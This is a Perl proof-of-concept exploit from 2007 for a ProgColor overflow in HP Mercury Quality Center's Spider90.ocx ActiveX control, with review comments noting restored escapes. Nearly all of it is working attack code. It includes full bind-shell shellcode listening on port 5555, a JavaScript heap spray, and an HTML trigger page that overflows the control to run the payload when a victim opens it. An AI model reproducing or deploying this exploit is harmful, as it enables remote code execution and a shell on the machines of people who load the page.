
# Title : HP Mercury Quality Center Spider90.ocx ProgColor Overflow Exploit
# Published : 2007-04-04
# Author : ri0t


#!/usr/bin/perl
# PoC exploit for the Mercury Quality Center Spider90.ocx ProgColor overflow.
# Writes exploit.html: a UTF-16LE page that heap-sprays a bind shell and then
# instantiates the control with an oversized ProgColor parameter.
# Credit to SkyLined, Trirat Puttaraksa, HDM, skape and the rest of the
# Metasploit crew: this exploit is largely a cut-and-paste of their code and
# they deserve the credit.
# Vulnerability found by Titon and Ri0t of Bastardlabs.

use strict;
use warnings;

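# Metasploit win32_bind payload, LPORT = 5555, unencoded (317 bytes).
# NOTE(review): the archived copy had lost every backslash ("xfcx6a..."), so
# the string was literal ASCII rather than bytes; the \x escapes are restored
# here. It is later run through convert_shellcode() into %u escapes, so the
# byte values themselves never appear in the generated HTML.
my $shellcode =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";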

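# Inline heap spray (SkyLined style). bigblock is a run of 0x90 NOPs; each
# sprayed block is NOP sled + shellcode, sized so that block+slackspace is
# just under 0x40000 bytes; 350 such blocks are kept alive in an array.
# headersize = 20 is presumably an allowance for the JS string header so the
# allocation lands on a predictable size - TODO confirm, it is carried over
# from the Metasploit template unchanged.
# NOTE(review): the archived copy had lost the backslashes in "\n" and "\"";
# restored here, and the quoting moved to q{} so the JS reads as written.
my $jscript = join "\n",
    q{<script>},
    'shellcode = unescape("' . convert_shellcode($shellcode) . '");',
    q{bigblock = unescape("%u9090%u9090");},
    q{headersize = 20;},
    q{slackspace = headersize+shellcode.length;},
    q{while (bigblock.length<slackspace) bigblock+=bigblock;},
    q{fillblock = bigblock.substring(0, slackspace);},
    q{block = bigblock.substring(0, bigblock.length-slackspace);},
    q{while(block.length+slackspace<0x40000) block = block+block+fillblock;},
    q{memory = new Array();},
    q{for (i=0;i<350;i++) memory[i] = block + shellcode;},
    q{</script>};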

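# Page skeleton. The spray script sits between </head> and <body> so it has
# run before the OBJECT tag below is parsed and the control is instantiated.
my $header =
    "<html>\n" .
    "<head>\n" .
    "</head>\n" .
    $jscript .
    "<body>\n";

my $footer =
    "</body>\n" .
    "</html>";

# Trigger: instantiate Spider90.ocx (the CLSID and CODEBASE version are the
# ones the original PoC targeted) and hand it an oversized ProgColor value.
# The value is a run of 'A's, "FFFF", then four 0x0d bytes - presumably the
# part that overwrites the control-flow target with 0x0d0d0d0d, which lands
# inside the sprayed NOP blocks; confirm against a debugger before reuse.
# NOTE(review): the archived copy had lost the backslashes in "\"" and
# "\x0d" (restored), and $body also carried its own </body></html>, so the
# output closed the document twice; the duplicate is dropped since $footer
# already supplies it.
my $body =
    qq{<OBJECT ID="MQC" CLASSID="CLSID:98c53984-8bf8-4d11-9b1c-c324fca9cade" CODEBASE="Spider90.ocx#Version=9,1,0,4353" WIDTH=100% HEIGHT=100%>\n} .
    qq{<PARAM NAME="ProgColor" value="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFFF\x0d\x0d\x0d\x0d">\n} .
    "</object>\n";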

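# Emit the page as UTF-16LE: the 0xFF 0xFE byte order mark, then every
# (single-byte) character followed by a NUL. The original called the BOM the
# "magic number of M$ unicode file".
my $page = "\xff\xfe";
for my $ch (split //, $header . $body . $footer) {
    $page .= $ch . "\x00";
}

# The output is binary (NULs, the BOM, raw 0x0d bytes), so the handle must
# not do newline translation: on Windows a text-mode "\n" -> "\r\n" would
# shift the 2-byte alignment and corrupt the UTF-16 stream. Open/close are
# checked so a silently empty exploit.html cannot pass unnoticed.
my $outfile = 'exploit.html';
open my $out, '>', $outfile or die "open $outfile: $!";
binmode $out;
print {$out} $page;
close $out or die "close $outfile: $!";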

# This function copy from JSUnescape() code in Metasploit
# Encode a byte string as JavaScript %uXXXX escapes for unescape().
# Adapted from Metasploit's JSUnescape(). Every %u unit carries two bytes;
# with $mode 'LE' (the default) the second byte is printed first, so that the
# UTF-16 code unit unescape() produces is laid out in memory in the original
# byte order. Any other $mode prints the bytes in input order.
# Odd-length input is padded by repeating its final byte, so the encoded
# payload may carry one trailing extra byte.
sub convert_shellcode {
    my ($raw, $mode) = @_;
    $mode ||= 'LE';

    # make the length even so every pair is complete
    $raw .= substr($raw, -1) if length($raw) % 2;

    my @units;
    for (my $pos = 0; $pos + 1 < length($raw); $pos += 2) {
        my ($first, $second) = unpack 'C2', substr($raw, $pos, 2);
        push @units, $mode eq 'LE'
            ? sprintf('%%u%02x%02x', $second, $first)
            : sprintf('%%u%02x%02x', $first, $second);
    }
    return join '', @units;
}

# www.Syue.com [2007-04-04]